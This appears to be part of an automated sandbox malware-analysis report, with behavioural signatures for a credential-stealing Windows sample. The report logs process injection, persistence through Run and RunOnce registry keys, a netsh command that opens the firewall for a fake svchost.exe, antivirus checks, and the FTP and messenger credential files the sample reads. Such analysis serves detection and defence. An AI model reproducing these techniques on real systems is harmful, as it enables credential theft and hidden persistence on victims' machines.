RegOpenKeyExA June 21, 2021, 12:58 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-1000-0000000FF1CE} base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90140000-0011-0000-1000-0000000FF1CE}		2
RegOpenKeyExA June 21, 2021, 12:58 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Acrobat 5.0 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Acrobat 5.0		2
RegOpenKeyExA June 21, 2021, 12:58 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Acrobat 5.0 base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Adobe Acrobat 5.0		2
RegOpenKeyExA June 21, 2021, 12:58 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{0134A1A1-C283-4A47-91A1-92F19F960372} base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{0134A1A1-C283-4A47-91A1-92F19F960372}		2
RegOpenKeyExA June 21, 2021, 12:58 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{0134A1A1-C283-4A47-91A1-92F19F960372} base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{0134A1A1-C283-4A47-91A1-92F19F960372}		2
RegOpenKeyExA June 21, 2021, 12:58 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{EFB21DE7-8C19-4A88-BB28-A766E16493BC} base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{EFB21DE7-8C19-4A88-BB28-A766E16493BC}		2
RegOpenKeyExA June 21, 2021, 12:58 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{EFB21DE7-8C19-4A88-BB28-A766E16493BC} base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{EFB21DE7-8C19-4A88-BB28-A766E16493BC}		2
RegOpenKeyExA June 21, 2021, 12:58 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{236BB7C4-4419-42FD-0409-1E257A25E34D} base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{236BB7C4-4419-42FD-0409-1E257A25E34D}		2
RegOpenKeyExA June 21, 2021, 12:58 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{236BB7C4-4419-42FD-0409-1E257A25E34D} base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{236BB7C4-4419-42FD-0409-1E257A25E34D}		2
RegOpenKeyExA June 21, 2021, 12:58 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A14F7508-B784-40B8-B11A-E0E2EEB7229F} base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A14F7508-B784-40B8-B11A-E0E2EEB7229F}		2
RegOpenKeyExA June 21, 2021, 12:58 p.m.	regkey_r: SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A14F7508-B784-40B8-B11A-E0E2EEB7229F} base_handle: 0x80000002 key_handle: 0x00000000 options: 0 access: 0x00020119 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{A14F7508-B784-40B8-B11A-E0E2EEB7229F}		2

Created a process named as a common system process (4 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW June 21, 2021, 12:58 p.m.	thread_identifier: 2892 thread_handle: 0x00000340 process_identifier: 8680 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\ProgramData\svchost.exe track: 1 command_line: "C:\ProgramData\svchost.exe" filepath_r: C:\ProgramData\svchost.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x0000032c	1	1
ShellExecuteExW June 21, 2021, 12:58 p.m.	show_type: 1 filepath_r: C:\ProgramData\svchost.exe parameters: filepath: C:\ProgramData\svchost.exe	1	1
CreateProcessInternalW June 21, 2021, 12:58 p.m.	thread_identifier: 8480 thread_handle: 0x00000778 process_identifier: 6500 current_directory: filepath: C:\ProgramData\svchost.exe track: 1 command_line: filepath_r: C:\ProgramData\svchost.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x0000076c	1	1
CreateProcessInternalW June 21, 2021, 12:58 p.m.	thread_identifier: 1468 thread_handle: 0x0000077c process_identifier: 3600 current_directory: filepath: C:\ProgramData\svchost.exe track: 1 command_line: filepath_r: C:\ProgramData\svchost.exe stack_pivoted: 0 creation_flags: 134217732 (CREATE_NO_WINDOW\|CREATE_SUSPENDED) inherit_handles: 0 process_handle: 0x00000770	1	1

Terminates another process (4 events)

Time & API	Arguments	Status
NtTerminateProcess June 21, 2021, 12:58 p.m.	status_code: 0x00000001 process_identifier: 7940 process_handle: 0x000000ec
NtTerminateProcess June 21, 2021, 12:58 p.m.	status_code: 0x00000001 process_identifier: 7940 process_handle: 0x000000ec	1
NtTerminateProcess June 21, 2021, 12:58 p.m.	status_code: 0xffffffff process_identifier: 6500 process_handle: 0x0000077c
NtTerminateProcess June 21, 2021, 12:58 p.m.	status_code: 0xffffffff process_identifier: 6500 process_handle: 0x0000077c	1

Uses Windows utilities for basic Windows functionality (15 events)

cmdline	C:\Users\test22\AppData\Local\Temp\bec864d5-56b2-4bb0-ac52-b85efc87c7a8\AdvancedRun.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\bec864d5-56b2-4bb0-ac52-b85efc87c7a8\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline	C:\Users\test22\AppData\Local\Temp\c0653c9e-ffa5-44ca-b9d2-e0edc675594a\AdvancedRun.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\c0653c9e-ffa5-44ca-b9d2-e0edc675594a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline	C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\AdvancedRun.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline	"C:\Users\test22\AppData\Local\Temp\a3bf0341-c294-4ec7-b6b5-41447877872f\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\a3bf0341-c294-4ec7-b6b5-41447877872f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline	"C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\b48c2de5-ab39-4bbf-8b57-fce6a08fd355\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline	"C:\Users\test22\AppData\Local\Temp\287ef45a-794f-4764-8158-ab3eb3b7f82e\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\287ef45a-794f-4764-8158-ab3eb3b7f82e\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline	netsh firewall add allowedprogram "C:\ProgramData\svchost.exe" "svchost.exe" ENABLE
cmdline	"C:\Users\test22\AppData\Local\Temp\c0653c9e-ffa5-44ca-b9d2-e0edc675594a\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\c0653c9e-ffa5-44ca-b9d2-e0edc675594a\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline	C:\Users\test22\AppData\Local\Temp\287ef45a-794f-4764-8158-ab3eb3b7f82e\AdvancedRun.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\287ef45a-794f-4764-8158-ab3eb3b7f82e\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline	"C:\Users\test22\AppData\Local\Temp\bec864d5-56b2-4bb0-ac52-b85efc87c7a8\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\bec864d5-56b2-4bb0-ac52-b85efc87c7a8\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline	C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline	"C:\Users\test22\AppData\Local\Temp\d6ed91e2-9539-4857-ade5-1c576ad9fc14\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\d6ed91e2-9539-4857-ade5-1c576ad9fc14\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline	"C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\AdvancedRun.exe" /EXEFilename "C:\Users\test22\AppData\Local\Temp\b4e0ccc1-38c6-4956-8f3c-173d66156970\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline	C:\Users\test22\AppData\Local\Temp\a3bf0341-c294-4ec7-b6b5-41447877872f\AdvancedRun.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\a3bf0341-c294-4ec7-b6b5-41447877872f\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run
cmdline	C:\Users\test22\AppData\Local\Temp\d6ed91e2-9539-4857-ade5-1c576ad9fc14\AdvancedRun.exe /EXEFilename "C:\Users\test22\AppData\Local\Temp\d6ed91e2-9539-4857-ade5-1c576ad9fc14\test.bat" /WindowState ""0"" /PriorityClass ""32"" /CommandLine "" /StartDirectory "" /RunAs 8 /Run

One or more of the buffers contains an embedded PE file (12 events)

buffer	Buffer with sha1: 1c3e0a83a9861bd7c8edb1a4dae00e83b888d8cf
buffer	Buffer with sha1: 36c3c7e6e82e68cdc8ec8c66d3e68643b271ef29
buffer	Buffer with sha1: fc7aeb248647a5eefae26c9d3f88d186f15f67cd
buffer	Buffer with sha1: 899346704d17e2e0cd69dd50776fe922d15acda3
buffer	Buffer with sha1: 5cd1dd8229ea1f943c80fa9ce76827512ee364c1
buffer	Buffer with sha1: fb24fcce9b1760c1defb4a24bfeb1b3968894505
buffer	Buffer with sha1: e477cc4445cf02e103a617b79f2c3f7b901de130
buffer	Buffer with sha1: 052a5d9de6910ac3b2fa34f3bac865fc5f52985d
buffer	Buffer with sha1: 0c6f2b2dcf733e6185e5a1176dccf10295798f1e
buffer	Buffer with sha1: 908d7fe2ce5be41f4096641dcc7ac0023edb4c94
buffer	Buffer with sha1: 76bbef1690b3915cca34d81e6c174b798f6ba0c1
buffer	Buffer with sha1: eb8cd550a7d85a2670837e41fa5bd988d59e4305

Communicates with host for which no DNS query was performed (1 event)

host

172.217.25.14

Allocates execute permission to another process indicative of possible code injection (18 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 2576 region_size: 172032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000007e0	1	0
NtAllocateVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 8508 region_size: 172032 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000076c	1	0
NtAllocateVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 2488 region_size: 69632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000224	1	0
NtAllocateVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 3960 region_size: 69632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02fa0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000bc	1	0
NtAllocateVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 2224 region_size: 69632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05020000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000bc	1	0
NtAllocateVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 6664 region_size: 69632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00270000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000bc	1	0
NtAllocateVirtualMemory June 21, 2021, 12:58 p.m.	process_identifier: 1132 region_size: 372736 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000025c	1	0
NtAllocateVirtualMemory June 21, 2021, 12:58 p.m.	process_identifier: 8384 region_size: 348160 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000ec	1	0
NtAllocateVirtualMemory June 21, 2021, 12:58 p.m.	process_identifier: 7940 region_size: 778240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000ec		3221225496
NtAllocateVirtualMemory June 21, 2021, 12:58 p.m.	process_identifier: 4408 region_size: 778240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000240	1	0
NtAllocateVirtualMemory June 21, 2021, 12:58 p.m.	process_identifier: 532 region_size: 929792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000244	1	0
NtAllocateVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 3472 region_size: 225280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000007dc	1	0
NtAllocateVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 5808 region_size: 69632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000224	1	0
NtAllocateVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 6452 region_size: 225280 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000774	1	0
NtAllocateVirtualMemory June 21, 2021, 12:58 p.m.	process_identifier: 5484 region_size: 57344 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000007dc	1	0
NtAllocateVirtualMemory June 21, 2021, 12:58 p.m.	process_identifier: 1048 region_size: 57344 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000784	1	0
NtAllocateVirtualMemory June 21, 2021, 12:58 p.m.	process_identifier: 6500 region_size: 57344 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000076c		3221225496
NtAllocateVirtualMemory June 21, 2021, 12:58 p.m.	process_identifier: 3600 region_size: 57344 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000770	1	0

Attempts to identify installed AV products by registry key (9 events)

registry	HKEY_LOCAL_MACHINE\SOFTWARE\Avira\AntiVir PersonalEdition Classic
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\CCPD-LC\KStore\00000082\00000049\000000b9
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\Norton PartitionMagic\8.0\UserInfo
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\ACT!\install
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\CCPD-LC\KStore\00000082\000000d2\0000025f
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Symantec\CCPD-LC\KStore\00000082\0000001e\0000004a
registry	HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\PC-cillin
registry	HKEY_LOCAL_MACHINE\SOFTWARE\TrendMicro\AntiVirus\15
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Zone Labs\ZoneAlarm\Registration

Checks the version of Bios, possibly for anti-virtualization (2 events)

registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion
registry	HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion

Installs itself for autorun at Windows startup (10 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\fdb1n217b2a716347aYpy7b42e8M8jdfM23	reg_value	C:\Windows\Resources\Themes\0N33brp1ee73eay28fbr2Mmce11G8172SP2d9n\svchost.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\fdb1n217b2a716347aYpy7b42e8M8jdfM23	reg_value	C:\Windows\Resources\Themes\0N33brp1ee73eay28fbr2Mmce11G8172SP2d9n\svchost.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\	reg_value	"C:\Users\test22\AppData\Roaming\GMPIRADFQY.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4	reg_value	C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\t14b8IM7c0bA4XfaOfnc1hcOur946lf69o15K4	reg_value	C:\Windows\Resources\Themes\aero\Shell\5ev6d0b9739921ve54Sd\svchost.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\javaupdate	reg_value	C:\Users\test22\AppData\Roaming\Install\Host.exe
reg_key	HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{84R20A67-Q1HP-57Q4-5F1G-A71A01846283}\StubPath	reg_value	"C:\Users\test22\AppData\Roaming\Install\Host.exe"
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\57w10427ebbdUHA4f4f4J20y9	reg_value	C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\57w10427ebbdUHA4f4f4J20y9	reg_value	C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\57w10427ebbdUHA4f4f4J20y9	reg_value	C:\Program Files\Common Files\System\kc7e6re8cC19dqS5Lbcj3d84cZRHu4kfX8G77aBt\svchost.exe

Deletes executed files from disk (1 event)

file	C:\ProgramData\svchost.exe

Harvests credentials from local FTP client softwares (8 events)

file	C:\ProgramData\FlashFXP\3\Sites.dat
file	C:\ProgramData\FlashFXP\4\Sites.dat
file	C:\Users\test22\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
file	C:\Users\test22\AppData\Roaming\Ipswitch\WS_FTP\Sites\ws_ftp.ini
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry	HKEY_LOCAL_MACHINE\SOFTWARE\VanDyke\SecureFX\License
registry	HKEY_CURRENT_USER\Software\Nico Mak Computing\WinZip\Winini
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Nico Mak Computing\WinZip\Winini

Harvests information related to installed instant messenger clients (11 events)

file	C:\Users\test22\AppData\Local\AIM\aimx.bin
file	C:\Users\test22\AppData\Roaming\Meebo\MeeboAccounts.txt
file	C:\Users\test22\AppData\Roaming\MySpace\IM\users.txt
file	C:\Users\test22\AppData\Roaming\.purple\accounts.xml
file	C:\Users\test22\AppData\Roaming\Trillian\users\global\accounts.ini
file	C:\Users\test22\AppData\Roaming\Xfire\XfireUser.ini
registry	HKEY_CURRENT_USER\Software\America Online\aim6\Passwords
registry	HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
registry	HKEY_CURRENT_USER\Software\IMVU\username
registry	HKEY_CURRENT_USER\Software\IMVU\password
registry	HKEY_CURRENT_USER\Software\Paltalk

Creates a thread using CreateRemoteThread in a non-child process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2488 created a remote thread in non-child process 3960
Process injection	Process 2488 created a remote thread in non-child process 2224
CreateRemoteThread June 21, 2021, 12:57 p.m.	thread_identifier: 7800 process_identifier: 3960 function_address: 0x02fa72d6 flags: 0 stack_size: 1048576 parameter: 0x00000000 process_handle: 0x000000bc	1	232	0
CreateRemoteThread June 21, 2021, 12:57 p.m.	thread_identifier: 7840 process_identifier: 2224 function_address: 0x050272d6 flags: 0 stack_size: 1048576 parameter: 0x00000000 process_handle: 0x000000bc	1	292	0

Manipulates memory of a non-child process indicative of process injection (8 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2488 manipulating memory of non-child process 3960
Process injection	Process 2488 manipulating memory of non-child process 2224
Process injection	Process 2488 manipulating memory of non-child process 7940
Process injection	Process 8680 manipulating memory of non-child process 6500
NtAllocateVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 3960 region_size: 69632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02fa0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000bc	1	0	0
NtAllocateVirtualMemory June 21, 2021, 12:57 p.m.	process_identifier: 2224 region_size: 69632 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05020000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000bc	1	0	0
NtAllocateVirtualMemory June 21, 2021, 12:58 p.m.	process_identifier: 7940 region_size: 778240 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000000ec		3221225496	0
NtAllocateVirtualMemory June 21, 2021, 12:58 p.m.	process_identifier: 6500 region_size: 57344 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000076c		3221225496	0

Potential code injection by writing to the memory of another process (42 events)

Time & API	Arguments	Status	Return
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÆ`à8ø¾W `@ pWK`À H.textÄ7 8 `.sdataÁð`ò<@À.rsrcÀ`.@@.reloc2@B base_address: 0x00400000 process_identifier: 2576 process_handle: 0x000007e0	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: 0 HX`häh4VS_VERSION_INFO½ïþ?ÈStringFileInfo¤040904b1, CommentsQQFW NoYv(CompanyNameCDS8FileDescriptionWUN LPg0FileVersion3.2.8.1: InternalNameZOQi RgU.exez+LegalCopyrightCopyright 2020 © DhA. All rights reserved.2LegalTrademarksCknCB OriginalFilenameZOQi RgU.exe2 ProductNameZOQi RgU4ProductVersion8.2.2.48Assembly Version8.2.2.4DVarFileInfo$Translation PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING base_address: 0x00426000 process_identifier: 2576 process_handle: 0x000007e0	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: PÀ7 base_address: 0x00428000 process_identifier: 2576 process_handle: 0x000007e0	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2576 process_handle: 0x000007e0	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: MZÿÿ¸@º´ Í!¸LÍ!This program cannot be run in DOS mode. $PELÆ`à8ø¾W `@ pWK`À H.textÄ7 8 `.sdataÁð`ò<@À.rsrcÀ`.@@.reloc2@B base_address: 0x00400000 process_identifier: 8508 process_handle: 0x0000076c	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: 0 HX`häh4VS_VERSION_INFO½ïþ?ÈStringFileInfo¤040904b1, CommentsQQFW NoYv(CompanyNameCDS8FileDescriptionWUN LPg0FileVersion3.2.8.1: InternalNameZOQi RgU.exez+LegalCopyrightCopyright 2020 © DhA. All rights reserved.2LegalTrademarksCknCB OriginalFilenameZOQi RgU.exe2 ProductNameZOQi RgU4ProductVersion8.2.2.48Assembly Version8.2.2.4DVarFileInfo$Translation PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDING base_address: 0x00426000 process_identifier: 8508 process_handle: 0x0000076c	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: PÀ7 base_address: 0x00428000 process_identifier: 8508 process_handle: 0x0000076c	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 8508 process_handle: 0x0000076c	1	1
WriteProcessMemory June 21, 2021, 12:57 p.m.	buffer: MZÿÿ¸@àº´ Í!¸LÍ!PELù½O[à²ÊaÐ@@ð.textÛ±² `.dataÐ¶@À.rsrcð¸@@.relocº@B base_address: 0x00400000 process_identifier: 2488 process_handle: 0x00000224	1	1
